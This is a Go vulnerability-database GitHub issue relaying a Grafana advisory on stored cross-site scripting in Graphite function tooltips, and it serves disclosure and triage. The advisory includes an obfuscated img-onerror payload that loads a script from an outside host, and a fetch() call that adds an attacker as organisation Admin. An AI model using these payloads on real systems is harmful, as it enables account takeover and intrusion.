Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

x/vulndb: potential Go vuln in github.com/grafana/grafana: GHSA-qrrg-gw7w-vp76 #1674

Closed
GoVulnBot opened this issue Mar 23, 2023 · 2 comments
Assignees
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.

Comments

@GoVulnBot
Copy link

In GitHub Security Advisory GHSA-qrrg-gw7w-vp76, there is a vulnerability in the following Go packages or modules:

Unit Fixed Vulnerable Ranges
github.com/grafana/grafana 9.2.15 >= 9.0.0, < 9.2.15

Cross references:

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.0.0
        fixed: 9.2.15
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.4.0
        fixed: 9.4.7
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 9.3.0
        fixed: 9.3.11
    packages:
      - package: github.com/grafana/grafana
  - module: github.com/grafana/grafana
    versions:
      - introduced: 8.0.0
        fixed: 8.5.22
    packages:
      - package: github.com/grafana/grafana
summary: Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip
description: "### Summary\nWhen a Graphite data source is added, one can use this
    data source in a dashboard. This contains a feature to use `Functions`. Once a
    function is selected, a small tooltip will be shown when hovering over the name
    of the function. This tooltip will allow you to delete the selected Function from
    your query or show the Function Description. However, no sanitization is done
    when adding this description to the DOM. Since it is not uncommon to connect to
    public data sources, and attacker could host a Graphite instance with modified
    Function Descriptions containing XSS payloads. When the victim uses it in a query
    and accidentally hovers over the Function Description, an attacker controlled
    XSS payload will be executed. This can be used to add the attacker as an Admin
    for example. \n\n### Details\n\n1. Spin up your own Graphite instance. I've done
    this using the `make devenv sources=graphite`.\n2. Now start a terminal for your
    Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py`
    \n3. Basically you can pick any function but I picked the `aggregateSeriesLists`
    function. Modify its description to be `\"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=
    onerror=eval(atob(this.id))>`\n\nThe result would look like this:\n\n```python\ndef
    aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos,
    func, xFilesFactor=None):\n  \"\"\"                                                                              \n
    \                                                                                             \n
    \ \"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=
    onerror=eval(atob(this.id))>\n                                                                           \n
    \ \"\"\"                  \n  if len(seriesListFirstPos) != len(seriesListSecondPos):
    \  \n    raise InputParameterError(             \n      \"seriesListFirstPos and
    seriesListSecondPos argument must have equal length\")\n  results = []                                          \n
    \                                   \n  for i in range(0, len(seriesListFirstPos)):
    \       \n    firstSeries = seriesListFirstPos[i]                                           \n
    \   secondSeries = seriesListSecondPos[i]         \n    aggregated = aggregate(requestContext,
    (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor) \n    if not aggregated:
    # empty list, no data found                          \n      continue                   \n
    \   result = aggregated[0]  # aggregate() can only return len 1 list           \n
    \   result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)'
    % (firstSeries.name, secondSeries.name)\n    results.append(result)                                                                           \n
    \ return results                                                         \n                                                                                                                   \n
    \                                                                                                      \naggregateSeriesLists.group
    = 'Combine'                                                             \naggregateSeriesLists.params
    = [\n  Param('seriesListFirstPos', ParamTypes.seriesList, required=True),\n  Param('seriesListSecondPos',
    ParamTypes.seriesList, required=True),\n  Param('func', ParamTypes.aggFunc, required=True),
    \                                                      \n  Param('xFilesFactor',
    ParamTypes.float),                                \n]                                                                                                \n```\n\n4.
    Save and quit the file. Restart your Graphite Container (I did this using the
    Restart Icon in Docker Desktop)\n5. Now login to your Grafana instance as an Organisation
    Admin.\n6. Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite
    data source`\n7. Add the url to the attackers Graphite instance (maybe enable
    `Skip TLS Verify`) and click `Save & test` and `Explore`\n8. In the newly opened
    page click the + icon next to `Functions` and search for `aggregateSeriesLists`
    and click it to add it.\n9. Now hover over `aggregateSeriesLists` with your mouse
    and move your mouse to the `?` icon.\n\n### Result\n\nOur payload will trigger
    and in this case it will include an external script to trigger the alerts.\n\n####
    Decoded payload\n\n```javascript\nvar a=document.createElement(\"script\");a.src=\"https://cm2.tel\";document.body.appendChild(a);\n```\n\n![image](https://user-images.githubusercontent.com/26874824/225035735-5d00e5d9-3302-4257-8f95-dd562e752893.png)\n\n\n###
    Impact\n\nIn the POC we've picked 1 function to have a XSS payload, but a real
    attacker would of course maximize the likelihood by replacing all of it's descriptions
    with XSS payloads. As shown above the attacker can now run arbitrary javascript
    in the browser of the victim. The victim can be any user using the malicious Graphite
    instance in a query (or while Exploring), including the Organisation Admin. If
    so, an attacker could include a payload to add them as an admin themselves.\n\nAn
    example would be something like this:\n\n```javascript\nfetch(\"/api/org/invites\",
    {\n  \"headers\": {\n    \"content-type\": \"application/json\"\n  },\n  \"body\":
    \"{\\\"name\\\":\\\"\\\",\\\"email\\\":\\\"\\\",\\\"role\\\":\\\"Admin\\\",\\\"sendEmail\\\":true,\\\"loginOrEmail\\\":\\\"hacker@hacker.com\\\"}\",\n
    \ \"method\": \"POST\",\n  \"credentials\": \"include\"\n});\n```\n\n### Mitigation\n\nThe
    vulnerability seems to occur in the following file: public\\app\\plugins\\datasource\\graphite\\components\\FunctionEditorControls.tsx\n\n```typescript\nconst
    FunctionDescription = React.lazy(async () => {\n  // @ts-ignore\n  const { default:
    rst2html } = await import(/* webpackChunkName: \"rst2html\" */ 'rst2html');\n
    \ return {\n    default(props: { description?: string }) {\n      return <div
    dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? '') }} />;\n
    \   },\n  };\n});\n```\n\nIn many other similar cases, some form of sanitization
    is used. I would advise to use the same here as rst2html itself will just leave
    HTML untouched when parsing the expected reStructuredText from Graphite. So now
    when it is applied using dangerouslySetInnerHTML our XSS payload will survive."
cves:
  - CVE-2023-1410
ghsas:
  - GHSA-qrrg-gw7w-vp76
references:
  - advisory: https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76
  - web: https://nvd.nist.gov/vuln/detail/CVE-2023-1410
  - fix: https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc
  - fix: https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6
  - fix: https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a
  - fix: https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a
  - web: https://grafana.com/security/security-advisories/cve-2023-1410/
  - advisory: https://github.com/advisories/GHSA-qrrg-gw7w-vp76

@jba jba self-assigned this Mar 24, 2023
@jba jba added the excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module. label Mar 24, 2023
@gopherbot
Copy link
Contributor

Change https://go.dev/cl/479297 mentions this issue: data/excluded: batch add GO-2023-1674, GO-2023-1671, GO-2023-1670, GO-2023-1669, GO-2023-1668, GO-2023-1667, GO-2023-1662, GO-2023-1661, GO-2023-1660, GO-2023-1659, GO-2023-1658, GO-2023-1657, GO-2023-1656, GO-2023-1655, GO-2023-1654, GO-2023-1653, GO-2023-1673, GO-2023-1666, GO-2023-1665

@gopherbot
Copy link
Contributor

Change https://go.dev/cl/592760 mentions this issue: data/reports: unexclude 75 reports

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
excluded: EFFECTIVELY_PRIVATE This vulnerability exists in a package can be imported, but isn't meant to be outside that module.
Projects
None yet
Development

No branches or pull requests

3 participants